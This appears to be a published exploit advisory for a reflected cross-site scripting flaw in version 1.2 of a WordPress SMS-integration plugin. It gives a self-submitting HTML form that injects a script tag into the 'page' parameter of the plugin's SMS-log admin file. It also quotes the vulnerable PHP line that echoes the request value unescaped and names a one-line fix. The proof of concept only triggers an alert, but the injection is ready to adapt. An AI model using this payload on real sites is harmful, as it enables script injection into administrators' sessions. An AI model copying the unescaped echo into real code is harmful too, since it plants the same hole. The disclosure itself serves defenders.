WordPress Contact Form 7 International SMS Integration 1.2 XSS

WordPress Contact Form 7 International SMS Integration plugin version 1.2 suffers from a cross site scripting vulnerability.


MD5 | 0b9ec0c731a198bb020a35fd2e3d8722

___________________________________________________
|
| Exploit Title: Wordpress Contact Form 7 International Sms Integration Plugin Cross Site Scripting
| Exploit Author: Ashiyane Digital security Team
| Vendor Homepage : https://wordpress.org/plugins/cf7-international-sms-integration/
| Software Link: https://downloads.wordpress.org/plugin/cf7-international-sms-integration.1.2.zip
| Version: 1.2
| Date: 2017 - 07 - 9
| Tested on: Kali-Linux /FireFox
|__________________________________________________

Exploit :

<html>
<body onload="document.exploit.submit()">
<form id="smslog-filter" method="get" action="http://Target/PATH/wp-content/plugins/
cf7-international-sms-integration/includes/admin/class-sms-log-display.php ">
<input type="hidden" name="page" value=""/><script>alert(1)</script>" />
<input type="hidden" name="tab" value="smslogs" />

</form>
</body>
</html>

__________________________________________________

Vulnerable method :
$_GET

Vulnerable File :
wp-content/plugins/cf7-international-sms-integration/includes/admin/class-sms-log-display.php

Vulnerable code:


line 366 :
<form id="smslog-filter" method="get" action="<?php echo $current_url; ?> ">
<input type="hidden" name="page" value="<?php echo $_REQUEST['page'] ?>" />
<input type="hidden" name="tab" value="smslogs" />
<?php $testListTable->display() ?>
</form>


__________________________________________________

#patch:

For fix this vulnerability you use htmlspecialchars() function .
__________________________________________________

Discovered By : M.R.S.L.Y
__________________________________________________



Related Posts